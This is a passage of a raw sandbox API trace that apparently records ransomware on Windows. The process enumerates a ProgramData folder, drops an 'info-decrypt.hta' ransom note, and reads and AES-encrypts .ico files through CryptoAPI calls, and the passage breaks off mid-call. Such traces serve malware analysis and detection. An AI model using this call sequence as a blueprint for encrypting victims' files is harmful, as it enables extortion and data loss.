ftCreationTime.dwLowDateTime=0x5f112be3, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f112be3, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7be8cbf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="print_queue.ico", cAlternateFileName="")) returned 1 [0169.594] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f138d40, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f138d40, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7c0ee1d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xec75, dwReserved0=0x0, dwReserved1=0x0, cFileName="scan_.ico", cAlternateFileName="")) returned 1 [0169.594] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f15ee9d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f15ee9d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7c0ee1d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x10654, dwReserved0=0x0, dwReserved1=0x0, cFileName="scan_property.ico", cAlternateFileName="")) returned 1 [0169.595] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f138d40, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f138d40, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7c34f7b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="scan_settings.ico", cAlternateFileName="")) returned 1 [0169.595] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f054512, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f054512, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7d3f90d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x0, dwReserved1=0x0, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0169.595] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0169.595] FindClose (in: hFindFile=0xb7f4d0 | out: hFindFile=0xb7f4d0) returned 1 [0169.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0169.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0169.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0169.596] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpFilePart=0x0) returned 0x51 [0169.596] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpFilePart=0x0) returned 0x52 [0169.596] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f4d0 [0169.596] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.596] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0169.597] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f15ee9d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f15ee9d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78a2eab, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0169.597] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0eca86, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0eca86, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78c9009, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xe3c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="print_pref.ico", cAlternateFileName="")) returned 1 [0169.597] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0eca86, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0eca86, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78c9009, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xebb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="print_property.ico", cAlternateFileName="")) returned 1 [0169.597] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f112be3, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f112be3, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7be8cbf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="print_queue.ico", cAlternateFileName="")) returned 1 [0169.597] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f138d40, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f138d40, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7c0ee1d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xec75, dwReserved0=0x0, dwReserved1=0x0, cFileName="scan_.ico", cAlternateFileName="")) returned 1 [0169.597] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f15ee9d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f15ee9d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7c0ee1d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x10654, dwReserved0=0x0, dwReserved1=0x0, cFileName="scan_property.ico", cAlternateFileName="")) returned 1 [0169.598] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f138d40, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f138d40, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7c34f7b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="scan_settings.ico", cAlternateFileName="")) returned 1 [0169.598] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f054512, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f054512, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7d3f90d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x0, dwReserved1=0x0, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0169.598] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f054512, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f054512, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7d3f90d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x0, dwReserved1=0x0, cFileName="tasks.xml", cAlternateFileName="")) returned 0 [0169.598] FindClose (in: hFindFile=0xb7f4d0 | out: hFindFile=0xb7f4d0) returned 1 [0169.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0169.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0169.599] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", lpFilePart=0x0) returned 0x5c [0169.599] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0169.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0169.599] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0169.599] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", lpFilePart=0x0) returned 0x5c [0169.599] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691eca8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0169.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f19c) returned 1 [0169.599] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320 [0169.600] GetFileType (hFile=0x320) returned 0x1 [0169.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f198) returned 1 [0169.600] GetFileType (hFile=0x320) returned 0x1 [0169.600] WriteFile (in: hFile=0x320, lpBuffer=0x375ec3c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x691f260, lpOverlapped=0x0 | out: lpBuffer=0x375ec3c*, lpNumberOfBytesWritten=0x691f260*=0x1000, lpOverlapped=0x0) returned 1 [0169.602] WriteFile (in: hFile=0x320, lpBuffer=0x375ec3c*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x691f234, lpOverlapped=0x0 | out: lpBuffer=0x375ec3c*, lpNumberOfBytesWritten=0x691f234*=0x55e, lpOverlapped=0x0) returned 1 [0169.602] CloseHandle (hObject=0x320) returned 1 [0169.603] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", lpFilePart=0x0) returned 0x5c [0169.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0169.603] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), fInfoLevelId=0x0, lpFileInformation=0x375fc58 | out: lpFileInformation=0x375fc58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f15ee9d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f15ee9d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78a2eab, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3)) returned 1 [0169.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0169.603] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", lpFilePart=0x0) returned 0x5c [0169.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0169.603] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0169.603] GetFileType (hFile=0x320) returned 0x1 [0169.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0169.603] GetFileType (hFile=0x320) returned 0x1 [0169.603] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0xd0a3 [0169.604] ReadFile (in: hFile=0x320, lpBuffer=0x375fec0, nNumberOfBytesToRead=0xd0a3, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x375fec0*, lpNumberOfBytesRead=0x691f29c*=0xd0a3, lpOverlapped=0x0) returned 1 [0169.640] CloseHandle (hObject=0x320) returned 1 [0169.640] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xb1eb70) returned 1 [0169.641] CryptGenRandom (in: hProv=0xb1eb70, dwLen=0x10, pbBuffer=0x376d2b8 | out: pbBuffer=0x376d2b8) returned 1 [0170.898] CryptImportKey (in: hProv=0xb1eb70, pbData=0x3a2af10, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7fc10) returned 1 [0170.898] CryptContextAddRef (hProv=0xb1eb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0170.899] CryptContextAddRef (hProv=0xb1eb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0170.899] CryptDuplicateKey (in: hKey=0xb7fc10, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f7d0) returned 1 [0170.899] CryptContextAddRef (hProv=0xb1eb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0170.899] CryptSetKeyParam (hKey=0xb7f7d0, dwParam=0x4, pbData=0x3a2aff0*=0x1, dwFlags=0x0) returned 1 [0170.899] CryptSetKeyParam (hKey=0xb7f7d0, dwParam=0x1, pbData=0x3a2afbc, dwFlags=0x0) returned 1 [0170.899] CryptEncrypt (in: hKey=0xb7f7d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a2b000*, pdwDataLen=0x691f268*=0xd0b0, dwBufLen=0xd0b0 | out: pbData=0x3a2b000*, pdwDataLen=0x691f268*=0xd0b0) returned 1 [0171.566] CryptEncrypt (in: hKey=0xb7f7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35ead20*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x35ead20*, pdwDataLen=0x691f270*=0x10) returned 1 [0171.567] CryptDestroyKey (hKey=0xb7fc10) returned 1 [0171.567] CryptReleaseContext (hProv=0xb1eb70, dwFlags=0x0) returned 1 [0171.567] CryptReleaseContext (hProv=0xb1eb70, dwFlags=0x0) returned 1 [0171.568] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", lpFilePart=0x0) returned 0x5c [0171.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0171.568] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0171.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0171.569] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", lpFilePart=0x0) returned 0x60 [0171.569] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0171.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0171.569] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21265660, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x21265660, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x21265660, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0171.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0171.570] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", lpFilePart=0x0) returned 0x60 [0171.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0171.570] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), fInfoLevelId=0x0, lpFileInformation=0x35ebcd4 | out: lpFileInformation=0x35ebcd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0eca86, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0eca86, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78c9009, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xe3c8)) returned 1 [0171.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0171.570] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", lpFilePart=0x0) returned 0x60 [0171.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0171.570] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0171.570] GetFileType (hFile=0x320) returned 0x1 [0171.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0171.570] GetFileType (hFile=0x320) returned 0x1 [0171.571] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0xe3c8 [0171.571] ReadFile (in: hFile=0x320, lpBuffer=0x35ebf5c, nNumberOfBytesToRead=0xe3c8, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x35ebf5c*, lpNumberOfBytesRead=0x691f29c*=0xe3c8, lpOverlapped=0x0) returned 1 [0171.683] CloseHandle (hObject=0x320) returned 1 [0171.684] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0x66baa70) returned 1 [0171.685] CryptGenRandom (in: hProv=0x66baa70, dwLen=0x10, pbBuffer=0x35fa9e8 | out: pbBuffer=0x35fa9e8) returned 1 [0174.273] CryptImportKey (in: hProv=0x66baa70, pbData=0x3756ce8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f750) returned 1 [0174.273] CryptContextAddRef (hProv=0x66baa70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0174.273] CryptContextAddRef (hProv=0x66baa70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0174.273] CryptDuplicateKey (in: hKey=0xb7f750, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f950) returned 1 [0174.273] CryptContextAddRef (hProv=0x66baa70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0174.273] CryptSetKeyParam (hKey=0xb7f950, dwParam=0x4, 